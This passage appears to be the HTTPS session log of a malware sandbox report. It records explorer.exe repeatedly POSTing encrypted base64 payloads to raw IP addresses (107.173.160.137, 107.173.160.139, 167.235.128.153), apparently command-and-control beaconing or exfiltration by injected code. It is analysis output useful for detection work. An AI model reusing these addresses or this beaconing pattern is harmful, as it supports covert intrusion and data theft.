                                                          2024-07-19 11:46:50 UTC685INData Raw: 44 2f 6f 36 71 53 73 47 48 72 44 50 65 69 6a 55 55 7a 7a 32 2f 6f 45 4e 36 66 6a 57 35 43 61 42 6d 4b 6e 50 59 59 52 49 61 33 7a 33 33 47 4e 68 50 37 44 75 5a 4b 51 69 78 2f 51 6f 69 61 54 70 6f 2f 4b 65 7a 65 33 43 54 66 39 77 30 64 79 4f 50 75 44 38 4e 36 58 48 47 6d 49 67 35 35 72 32 4c 57 6b 4a 73 4e 64 61 78 61 5a 6a 2b 4b 6c 77 4b 6c 72 59 77 79 56 41 52 44 7a 6d 72 76 6e 76 4b 78 5a 77 74 79 30 33 54 64 32 78 4d 2f 69 50 49 69 41 63 6b 58 65 4a 75 46 68 39 59 52 41 53 65 49 44 51 44 6b 71 44 44 39 39 51 7a 56 70 50 69 36 49 2b 36 35 2b 38 4b 69 41 32 33 74 43 77 37 77 48 51 35 49 32 43 6c 53 69 67 6c 6d 41 48 4b 53 4c 33 66 36 61 6d 6c 67 58 4a 31 51 4d 6b 6b 45 78 74 53 64 47 36 33 2f 6f 7a 35 41 52 59 79 53 71 56 66 74 48 61 31 67 68 39 72 38 73
                                                          Data Ascii: D/o6qSsGHrDPeijUUzz2/oEN6fjW5CaBmKnPYYRIa3z33GNhP7DuZKQix/QoiaTpo/Keze3CTf9w0dyOPuD8N6XHGmIg55r2LWkJsNdaxaZj+KlwKlrYwyVARDzmrvnvKxZwty03Td2xM/iPIiAckXeJuFh9YRASeIDQDkqDD99QzVpPi6I+65+8KiA23tCw7wHQ5I2ClSiglmAHKSL3f6amlgXJ1QMkkExtSdG63/oz5ARYySqVftHa1gh9r8s


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          76192.168.2.557885107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:51 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:51 UTC1122OUTData Raw: 41 4b 78 31 70 4f 35 41 42 32 47 71 4d 43 4e 38 67 59 68 62 35 62 57 47 78 63 30 66 6e 4a 45 33 78 53 76 49 47 52 4c 66 50 78 54 73 41 6d 53 43 6b 47 62 62 55 42 56 73 4a 4b 69 57 4f 52 38 2b 7a 70 49 35 35 52 71 33 47 2b 5a 73 37 57 4e 52 74 30 4e 46 64 79 71 62 42 46 43 44 31 44 5a 6b 43 50 62 72 48 30 45 6e 4c 55 6e 48 4b 53 2f 4f 67 53 50 6d 67 61 68 4d 4e 2f 6d 79 62 4f 53 6e 64 33 62 42 4a 79 34 64 78 36 66 38 4c 73 64 2f 57 62 76 39 34 46 6c 44 54 2b 74 63 64 31 34 37 4c 74 69 37 53 53 71 38 55 68 4b 66 4f 4a 44 7a 44 52 6c 2f 46 75 76 51 67 77 4a 6b 52 6e 7a 44 50 43 6f 67 76 41 51 63 51 71 73 6f 65 36 61 57 59 68 34 72 43 6e 6c 34 6d 6e 53 5a 69 5a 75 4a 75 6f 70 73 6f 67 64 62 53 48 76 6d 55 52 44 77 73 4d 54 4f 63 42 6e 41 6c 74 68 66 56 4b 68
                                                          Data Ascii: AKx1pO5AB2GqMCN8gYhb5bWGxc0fnJE3xSvIGRLfPxTsAmSCkGbbUBVsJKiWOR8+zpI55Rq3G+Zs7WNRt0NFdyqbBFCD1DZkCPbrH0EnLUnHKS/OgSPmgahMN/mybOSnd3bBJy4dx6f8Lsd/Wbv94FlDT+tcd147Lti7SSq8UhKfOJDzDRl/FuvQgwJkRnzDPCogvAQcQqsoe6aWYh4rCnl4mnSZiZuJuopsogdbSHvmURDwsMTOcBnAlthfVKh
                                                          2024-07-19 11:46:52 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:52 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:52 UTC685INData Raw: 5a 4b 6f 41 64 52 53 6c 47 2f 72 4a 71 48 32 5a 45 35 55 6c 45 47 75 49 49 2b 67 6f 32 62 73 76 56 7a 57 65 33 37 38 4e 45 4e 54 64 41 6e 34 73 66 73 62 78 45 56 42 39 33 31 32 57 59 35 41 67 59 75 37 45 51 49 33 38 71 51 32 53 59 59 77 44 35 52 39 4b 50 79 34 6d 45 51 39 71 6a 6e 65 41 53 51 34 41 36 34 58 77 4f 6d 4e 68 41 54 71 55 73 77 47 5a 6c 70 77 31 30 45 6a 2b 67 6a 57 61 55 32 63 37 68 37 61 55 46 73 4f 68 2b 4b 57 36 68 47 65 44 45 45 51 6f 44 78 36 54 55 41 74 46 36 52 47 43 61 72 50 51 61 62 37 69 32 74 7a 6f 50 78 6a 4e 61 5a 67 6c 75 79 4b 44 36 41 76 4a 34 36 70 6a 2f 38 69 34 54 70 34 44 52 70 32 4f 5a 73 4c 7a 38 78 73 53 44 2f 61 49 58 72 54 4c 45 48 36 75 64 47 41 71 48 6f 52 73 75 53 2b 43 32 4a 58 34 4a 46 69 4c 66 5a 2f 4e 48 35 36
                                                          Data Ascii: ZKoAdRSlG/rJqH2ZE5UlEGuII+go2bsvVzWe378NENTdAn4sfsbxEVB9312WY5AgYu7EQI38qQ2SYYwD5R9KPy4mEQ9qjneASQ4A64XwOmNhATqUswGZlpw10Ej+gjWaU2c7h7aUFsOh+KW6hGeDEEQoDx6TUAtF6RGCarPQab7i2tzoPxjNaZgluyKD6AvJ46pj/8i4Tp4DRp2OZsLz8xsSD/aIXrTLEH6udGAqHoRsuS+C2JX4JFiLfZ/NH56


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          77192.168.2.557887107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:53 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:53 UTC1267OUTData Raw: 4c 41 79 75 6c 47 30 4b 64 44 55 41 4d 74 62 36 76 36 4b 6b 48 53 70 6e 42 6e 73 38 4a 58 58 6b 39 2b 48 65 72 6c 50 74 4e 64 47 77 73 38 78 70 77 75 48 78 73 66 51 6e 6b 57 37 7a 47 64 32 6b 35 31 59 4b 66 78 58 79 63 4d 62 62 56 67 44 43 2b 41 73 43 6e 44 36 39 55 4d 6e 66 73 61 61 38 73 36 6d 6d 2f 42 67 49 6d 35 4b 31 58 2f 62 53 54 50 34 56 51 4a 61 70 6e 67 66 36 4a 44 36 6d 5a 68 76 56 4b 57 44 44 34 67 56 62 78 58 4e 79 2f 42 4a 44 47 6a 6d 42 37 35 6d 32 70 6c 6e 4a 57 65 74 36 4e 46 4f 49 2f 6b 71 38 46 58 4d 6b 53 6e 4f 49 45 78 4c 77 72 69 4c 2f 36 51 44 4a 6f 6f 30 64 4a 44 53 6e 37 2b 72 45 6e 2b 65 64 38 2f 46 36 73 66 6b 54 55 66 48 58 6a 42 2b 4d 77 6e 59 64 6e 69 4e 53 31 78 78 7a 2f 44 73 32 63 4a 6b 58 61 76 37 58 56 55 49 48 41 73 74
                                                          Data Ascii: LAyulG0KdDUAMtb6v6KkHSpnBns8JXXk9+HerlPtNdGws8xpwuHxsfQnkW7zGd2k51YKfxXycMbbVgDC+AsCnD69UMnfsaa8s6mm/BgIm5K1X/bSTP4VQJapngf6JD6mZhvVKWDD4gVbxXNy/BJDGjmB75m2plnJWet6NFOI/kq8FXMkSnOIExLwriL/6QDJoo0dJDSn7+rEn+ed8/F6sfkTUfHXjB+MwnYdniNS1xxz/Ds2cJkXav7XVUIHAst
                                                          2024-07-19 11:46:54 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:54 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:54 UTC685INData Raw: 6e 65 50 67 48 47 38 46 41 46 32 4d 2f 49 52 45 6a 64 77 77 56 69 61 65 4a 5a 49 50 77 45 74 6a 73 37 61 79 4d 53 63 32 32 6f 36 75 4b 6d 71 54 31 47 2f 39 70 4d 77 38 4a 62 5a 74 39 49 78 47 54 68 6d 66 49 53 39 4f 35 4c 37 66 55 4c 37 70 71 76 49 49 44 59 5a 6d 57 46 72 67 6c 33 51 2b 50 6f 65 74 76 6f 6e 31 55 4f 2b 61 51 55 2f 7a 35 6b 41 43 45 31 41 6a 33 70 6c 75 78 7a 4a 76 54 2f 38 2b 58 68 6f 36 47 75 68 57 34 7a 48 4f 54 4d 2b 6c 71 71 43 7a 6f 6e 34 39 30 6b 68 44 34 59 37 37 6f 63 2f 73 79 46 4a 4a 61 63 34 55 79 31 46 37 51 36 61 6c 58 31 6f 79 48 31 6f 45 2f 74 6d 77 54 78 42 70 33 4a 6e 77 70 48 74 37 4d 6f 67 4d 6d 66 73 35 53 30 6e 6b 6f 36 59 37 59 31 6c 57 61 5a 50 59 33 62 2b 33 75 54 4f 69 64 6c 30 2f 4d 68 70 75 5a 6d 34 38 48 4c 5a
                                                          Data Ascii: nePgHG8FAF2M/IREjdwwViaeJZIPwEtjs7ayMSc22o6uKmqT1G/9pMw8JbZt9IxGThmfIS9O5L7fUL7pqvIIDYZmWFrgl3Q+Poetvon1UO+aQU/z5kACE1Aj3pluxzJvT/8+Xho6GuhW4zHOTM+lqqCzon490khD4Y77oc/syFJJac4Uy1F7Q6alX1oyH1oE/tmwTxBp3JnwpHt7MogMmfs5S0nko6Y7Y1lWaZPY3b+3uTOidl0/MhpuZm48HLZ


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          78192.168.2.557888167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:55 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:55 UTC1122OUTData Raw: 66 74 4d 44 4f 30 62 69 41 41 4d 36 57 38 44 56 69 35 6c 6f 6b 77 41 6f 51 6d 56 68 34 44 5a 69 69 39 49 59 6b 63 31 6d 2b 42 56 6a 64 6b 42 58 6f 6e 66 47 61 4c 6e 56 48 72 67 2b 43 79 46 4c 65 70 62 37 46 63 30 4b 34 54 6b 32 55 56 39 61 44 4a 70 53 6e 44 76 76 57 6f 68 45 61 66 56 72 42 6d 30 5a 74 69 68 69 66 32 2f 56 55 42 6a 73 77 38 4b 76 2b 36 7a 50 56 61 5a 4b 43 49 72 53 4b 57 54 48 30 41 50 54 48 39 6f 72 71 50 46 52 38 73 57 43 54 63 35 37 6e 62 6d 2b 79 2f 67 6a 58 4e 72 69 52 76 65 41 54 61 4a 36 4c 35 41 52 6d 58 74 7a 31 66 63 36 31 77 72 4e 55 6d 79 75 36 54 69 57 35 35 6a 45 4d 7a 66 39 31 51 71 72 4c 35 52 58 63 73 48 44 47 76 6e 73 7a 53 57 6e 50 4d 45 71 4f 43 56 38 73 5a 2f 68 34 41 4b 32 62 31 6e 65 75 72 58 78 57 6e 44 55 73 57 67
                                                          Data Ascii: ftMDO0biAAM6W8DVi5lokwAoQmVh4DZii9IYkc1m+BVjdkBXonfGaLnVHrg+CyFLepb7Fc0K4Tk2UV9aDJpSnDvvWohEafVrBm0Ztihif2/VUBjsw8Kv+6zPVaZKCIrSKWTH0APTH9orqPFR8sWCTc57nbm+y/gjXNriRveATaJ6L5ARmXtz1fc61wrNUmyu6TiW55jEMzf91QqrL5RXcsHDGvnszSWnPMEqOCV8sZ/h4AK2b1neurXxWnDUsWg
                                                          2024-07-19 11:46:56 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:56 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:56 UTC685INData Raw: 78 38 6b 37 31 71 30 50 74 4d 32 42 34 46 6f 50 6f 49 61 72 35 70 4d 4a 77 59 78 53 73 46 50 31 4a 33 6e 6e 6c 52 63 46 36 79 37 36 46 77 44 39 4d 43 37 4c 6f 6d 2b 37 72 6e 69 6b 36 62 4f 51 72 4b 50 30 4c 75 6b 7a 50 56 47 75 7a 33 34 35 32 37 6c 59 54 43 61 35 32 49 68 2b 37 4e 57 30 53 2b 6e 47 54 78 4e 4e 37 69 59 4e 2b 57 39 61 52 66 6c 43 4d 38 58 4c 65 46 43 55 44 6d 5a 61 6a 74 36 44 58 36 66 72 58 42 55 6e 77 59 59 6e 76 6a 30 38 69 69 2f 35 62 37 6e 6b 63 63 66 45 31 64 43 68 65 52 4e 76 66 79 7a 43 53 76 47 57 42 6c 6b 47 76 6b 63 69 79 2b 34 69 6f 67 72 62 70 71 77 2f 77 66 62 59 6b 39 4a 4c 46 39 53 2b 6c 32 32 33 53 53 71 4f 58 58 78 4c 46 43 72 6f 5a 52 45 71 7a 68 36 69 36 4a 49 6f 30 79 68 30 43 48 42 78 30 39 4f 69 56 41 57 53 64 55 35
                                                          Data Ascii: x8k71q0PtM2B4FoPoIar5pMJwYxSsFP1J3nnlRcF6y76FwD9MC7Lom+7rnik6bOQrKP0LukzPVGuz34527lYTCa52Ih+7NW0S+nGTxNN7iYN+W9aRflCM8XLeFCUDmZajt6DX6frXBUnwYYnvj08ii/5b7nkccfE1dCheRNvfyzCSvGWBlkGvkciy+4iogrbpqw/wfbYk9JLF9S+l223SSqOXXxLFCroZREqzh6i6JIo0yh0CHBx09OiVAWSdU5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          79192.168.2.557889107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:57 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:57 UTC1122OUTData Raw: 6d 32 78 4d 2f 63 6b 38 30 4f 36 49 66 69 6d 38 6a 7a 65 34 79 65 70 70 2f 78 2b 65 64 59 34 55 52 52 78 6d 68 63 55 6d 62 6b 44 58 76 6e 50 49 6a 46 33 46 4b 43 47 59 4c 4d 73 55 62 4c 59 4f 76 53 57 6f 33 6f 4a 62 4e 66 6c 65 64 57 4a 73 50 45 66 44 5a 61 49 67 41 49 56 44 6d 32 37 63 4a 2f 37 77 4e 4e 53 71 68 75 38 34 76 41 70 41 32 47 71 53 32 66 71 4f 43 67 50 71 6a 30 4a 2f 68 70 43 48 4c 66 35 7a 66 33 76 35 64 49 6b 57 4e 48 67 57 69 53 36 42 58 4b 77 66 42 51 4d 62 57 65 38 6d 42 2f 65 4b 56 4e 72 67 56 56 59 67 75 41 4c 74 78 6c 6b 4b 4b 79 69 66 50 61 45 62 48 65 71 62 35 58 71 72 49 33 75 66 6b 43 73 30 32 34 65 35 49 50 53 4f 4c 7a 6a 76 6b 35 6c 4e 58 5a 54 4d 32 32 69 49 77 74 44 32 72 77 67 32 7a 61 62 70 47 2f 68 53 55 4f 65 79 4e 67 75
                                                          Data Ascii: m2xM/ck80O6Ifim8jze4yepp/x+edY4URRxmhcUmbkDXvnPIjF3FKCGYLMsUbLYOvSWo3oJbNfledWJsPEfDZaIgAIVDm27cJ/7wNNSqhu84vApA2GqS2fqOCgPqj0J/hpCHLf5zf3v5dIkWNHgWiS6BXKwfBQMbWe8mB/eKVNrgVVYguALtxlkKKyifPaEbHeqb5XqrI3ufkCs024e5IPSOLzjvk5lNXZTM22iIwtD2rwg2zabpG/hSUOeyNgu
                                                          2024-07-19 11:46:58 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:58 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:58 UTC685INData Raw: 64 2f 50 59 4d 37 72 53 32 57 39 76 54 4f 72 74 6e 6a 38 73 65 57 48 77 35 68 67 47 75 67 74 68 69 33 71 50 2f 61 4a 32 45 78 54 51 46 35 68 46 34 79 50 6d 41 73 36 44 48 41 77 53 64 32 76 75 77 6b 75 6d 44 59 6b 34 48 2b 63 42 62 57 32 6f 6e 76 36 72 72 70 65 75 6b 49 65 44 39 47 33 2f 68 4f 63 6c 55 52 39 71 36 7a 74 76 39 51 65 4b 6d 59 66 36 6a 6d 39 36 79 4b 57 35 59 39 63 61 36 49 6e 42 73 46 33 6f 5a 6b 62 6b 63 45 69 32 30 46 56 2b 39 64 68 42 4d 76 33 50 43 70 55 77 62 73 32 62 36 36 4b 6c 4b 45 48 68 35 61 52 33 77 2b 42 67 44 33 6d 78 70 6f 65 57 54 5a 42 31 52 6e 65 69 6e 53 31 78 46 38 53 55 74 69 50 47 56 67 31 67 32 4d 67 4a 5a 6a 6c 47 65 70 74 33 61 5a 78 55 56 42 59 2f 61 79 38 57 62 38 46 36 4e 44 48 79 6f 37 5a 64 64 58 43 7a 6d 72 74
                                                          Data Ascii: d/PYM7rS2W9vTOrtnj8seWHw5hgGugthi3qP/aJ2ExTQF5hF4yPmAs6DHAwSd2vuwkumDYk4H+cBbW2onv6rrpeukIeD9G3/hOclUR9q6ztv9QeKmYf6jm96yKW5Y9ca6InBsF3oZkbkcEi20FV+9dhBMv3PCpUwbs2b66KlKEHh5aR3w+BgD3mxpoeWTZB1RneinS1xF8SUtiPGVg1g2MgJZjlGept3aZxUVBY/ay8Wb8F6NDHyo7ZddXCzmrt


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          80192.168.2.557891107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:59 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:59 UTC1267OUTData Raw: 5a 70 6b 76 38 48 33 6b 4f 46 56 4e 42 4f 63 61 38 6a 2b 73 47 33 75 54 4a 67 54 4f 46 39 4c 46 57 32 37 30 77 76 4c 4c 49 70 6c 6d 58 6b 42 65 55 43 4c 4f 64 5a 38 50 7a 61 37 6a 75 75 54 66 31 72 4d 49 50 2b 4a 36 74 6f 72 31 6f 77 55 69 31 79 65 66 5a 4a 53 49 5a 49 31 6e 56 46 76 48 74 73 48 7a 37 75 54 6d 34 42 54 4f 63 37 4c 34 70 55 54 52 68 62 70 39 69 6c 4d 6f 32 70 61 57 58 2f 52 51 41 47 77 64 50 75 6f 30 2f 6d 79 76 32 68 43 44 46 53 63 48 57 79 6f 39 6f 67 66 36 66 44 34 68 30 65 57 59 33 67 7a 48 77 42 33 35 36 4d 42 68 65 6c 30 34 6a 6c 63 69 42 63 70 54 78 38 59 54 73 52 2f 58 30 65 4c 75 59 54 46 43 69 75 71 77 6c 63 7a 6f 63 61 53 31 6e 4b 48 52 37 2f 75 35 32 54 34 59 4d 46 6a 4e 37 54 79 67 6a 77 4a 50 6c 47 75 70 79 61 6c 4c 65 31 37
                                                          Data Ascii: Zpkv8H3kOFVNBOca8j+sG3uTJgTOF9LFW270wvLLIplmXkBeUCLOdZ8Pza7juuTf1rMIP+J6tor1owUi1yefZJSIZI1nVFvHtsHz7uTm4BTOc7L4pUTRhbp9ilMo2paWX/RQAGwdPuo0/myv2hCDFScHWyo9ogf6fD4h0eWY3gzHwB356MBhel04jlciBcpTx8YTsR/X0eLuYTFCiuqwlczocaS1nKHR7/u52T4YMFjN7TygjwJPlGupyalLe17
                                                          2024-07-19 11:47:00 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:47:00 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:47:00 UTC685INData Raw: 77 6a 47 62 6f 4f 6f 68 53 45 31 49 76 64 63 32 75 6f 50 69 62 37 30 35 32 37 58 6d 68 6b 46 33 61 67 2b 54 59 53 34 38 75 4b 65 52 4c 46 33 32 2b 54 59 6f 4c 30 51 35 55 78 7a 45 6d 33 46 4a 68 71 61 6d 6f 72 74 39 73 68 58 64 67 42 6c 75 2b 44 77 41 63 75 4b 53 78 4b 48 4e 56 4b 67 6e 67 55 7a 51 79 4f 6f 75 42 37 4f 4a 76 6f 74 6e 55 45 48 59 45 4f 31 55 4c 49 73 78 7a 49 34 47 69 42 59 55 7a 6f 46 41 76 59 31 67 63 6b 62 77 7a 75 65 4e 54 4c 78 71 43 56 2f 6a 49 49 47 36 6a 4c 47 57 77 5a 5a 36 56 4c 4d 56 4c 51 35 6e 4f 46 7a 2b 34 6d 4f 79 42 75 44 38 6f 50 59 48 45 51 36 63 61 71 54 62 38 78 42 64 51 34 58 75 59 55 59 66 5a 6c 32 37 41 76 72 36 75 36 44 78 2b 48 6c 43 66 58 45 6f 5a 74 45 6a 6c 62 4d 55 30 75 72 5a 45 7a 2b 6e 46 6a 31 69 7a 53 52
                                                          Data Ascii: wjGboOohSE1Ivdc2uoPib70527XmhkF3ag+TYS48uKeRLF32+TYoL0Q5UxzEm3FJhqamort9shXdgBlu+DwAcuKSxKHNVKgngUzQyOouB7OJvotnUEHYEO1ULIsxzI4GiBYUzoFAvY1gckbwzueNTLxqCV/jIIG6jLGWwZZ6VLMVLQ5nOFz+4mOyBuD8oPYHEQ6caqTb8xBdQ4XuYUYfZl27Avr6u6Dx+HlCfXEoZtEjlbMU0urZEz+nFj1izSR


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          81192.168.2.557892167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:47:01 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:47:01 UTC1122OUTData Raw: 70 6c 57 37 6e 4a 36 4e 30 2f 41 35 53 49 71 6d 4b 49 2f 4b 77 4f 61 50 4a 32 6d 48 57 32 4d 49 38 2b 31 2f 59 64 4d 4b 4c 32 4b 7a 72 5a 4b 75 34 49 33 31 76 31 6c 76 6d 7a 68 4a 69 44 32 32 7a 36 51 56 42 77 31 66 65 72 66 38 69 47 55 66 51 6a 70 2b 6f 6d 57 47 73 76 46 4c 38 47 39 34 78 4e 76 7a 75 67 6f 37 72 66 67 37 4d 6e 6a 72 42 41 33 32 62 78 56 52 6d 4a 55 69 2b 32 6f 79 35 71 47 57 6a 2b 73 52 74 76 33 62 2b 47 53 36 6c 57 67 41 54 59 43 6a 53 71 62 76 5a 67 61 77 41 65 6d 6b 2b 43 66 79 53 4d 52 61 6f 58 48 36 68 33 4a 42 5a 56 53 78 6c 36 6d 37 46 52 52 55 52 74 73 71 77 59 73 6d 45 4c 70 67 35 70 66 48 69 75 68 61 53 39 6d 34 57 75 30 71 6a 4c 64 2f 34 6a 79 39 52 73 43 33 77 43 52 39 79 5a 56 65 58 35 65 2f 65 32 67 73 75 77 63 51 39 2f 48
                                                          Data Ascii: plW7nJ6N0/A5SIqmKI/KwOaPJ2mHW2MI8+1/YdMKL2KzrZKu4I31v1lvmzhJiD22z6QVBw1ferf8iGUfQjp+omWGsvFL8G94xNvzugo7rfg7MnjrBA32bxVRmJUi+2oy5qGWj+sRtv3b+GS6lWgATYCjSqbvZgawAemk+CfySMRaoXH6h3JBZVSxl6m7FRRURtsqwYsmELpg5pfHiuhaS9m4Wu0qjLd/4jy9RsC3wCR9yZVeX5e/e2gsuwcQ9/H
                                                          2024-07-19 11:47:02 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:47:02 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:47:02 UTC685INData Raw: 52 64 6c 57 4b 63 6e 38 57 74 78 55 67 77 54 6f 4b 65 6c 38 37 79 30 38 57 43 50 64 72 6f 70 5a 38 48 44 6f 6b 36 64 66 30 65 33 65 6c 74 39 7a 4b 38 4f 55 6d 47 67 2f 53 63 74 5a 6b 62 48 51 56 61 2f 69 47 6f 66 4d 59 66 62 39 59 45 5a 79 39 70 4c 75 77 39 2f 71 48 4d 76 49 52 4f 44 64 66 71 78 4d 71 6a 34 67 43 57 42 38 54 71 2b 36 70 31 50 2f 5a 47 67 63 48 63 32 6c 44 4c 65 52 49 65 2f 45 57 58 6c 6b 70 30 43 4d 70 39 6a 78 74 38 31 39 70 69 47 5a 47 30 32 4a 46 4c 66 58 43 63 41 31 7a 4e 73 69 47 59 44 53 38 67 65 70 6c 2b 49 35 48 46 30 64 75 2b 65 4d 49 72 65 6a 33 76 51 45 52 53 31 62 4c 50 64 2f 2f 68 41 67 4b 6e 49 6d 73 4a 33 57 39 57 4c 67 77 48 75 56 33 52 4a 63 50 68 68 4a 33 30 33 6a 49 78 65 71 74 62 4e 6e 6f 32 64 70 2b 50 4d 77 6f 54 45
                                                          Data Ascii: RdlWKcn8WtxUgwToKel87y08WCPdropZ8HDok6df0e3elt9zK8OUmGg/SctZkbHQVa/iGofMYfb9YEZy9pLuw9/qHMvIRODdfqxMqj4gCWB8Tq+6p1P/ZGgcHc2lDLeRIe/EWXlkp0CMp9jxt819piGZG02JFLfXCcA1zNsiGYDS8gepl+I5HF0du+eMIrej3vQERS1bLPd//hAgKnImsJ3W9WLgwHuV3RJcPhhJ303jIxeqtbNno2dp+PMwoTE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          82192.168.2.557893107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:47:03 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:47:03 UTC1122OUTData Raw: 45 55 32 43 32 35 67 39 7a 45 7a 63 4f 4e 67 6f 66 72 35 30 31 65 4b 38 2f 46 57 36 6a 6b 33 72 7a 32 76 47 31 5a 78 42 42 77 31 4a 39 4f 64 59 71 64 44 7a 41 6a 69 68 35 7a 49 4f 65 4c 64 79 72 64 48 33 75 77 5a 76 30 67 4c 61 6d 64 41 79 4b 38 38 64 44 71 75 49 2f 2b 4e 73 35 6e 66 6e 31 55 7a 4b 4a 46 46 76 35 73 4d 67 47 71 4a 39 58 62 30 6d 44 36 37 55 57 56 56 57 2b 74 53 35 76 6a 74 72 35 52 64 36 69 53 55 34 62 4d 73 73 53 7a 49 73 4e 4e 71 68 69 76 59 4d 35 42 69 6e 49 51 39 2f 32 4e 77 41 6f 58 7a 45 4c 5a 61 73 61 47 53 4c 35 41 56 4c 33 41 39 38 53 70 54 64 67 57 54 44 59 63 31 6e 72 73 32 4f 6c 71 45 62 41 49 69 6c 50 55 34 32 6a 68 59 62 36 55 4d 79 56 31 50 4e 4f 4b 38 79 70 66 47 76 59 30 41 74 36 57 71 66 35 4b 69 4c 4a 78 4a 43 55 63 70
                                                          Data Ascii: EU2C25g9zEzcONgofr501eK8/FW6jk3rz2vG1ZxBBw1J9OdYqdDzAjih5zIOeLdyrdH3uwZv0gLamdAyK88dDquI/+Ns5nfn1UzKJFFv5sMgGqJ9Xb0mD67UWVVW+tS5vjtr5Rd6iSU4bMssSzIsNNqhivYM5BinIQ9/2NwAoXzELZasaGSL5AVL3A98SpTdgWTDYc1nrs2OlqEbAIilPU42jhYb6UMyV1PNOK8ypfGvY0At6Wqf5KiLJxJCUcp
                                                          2024-07-19 11:47:04 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:47:04 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
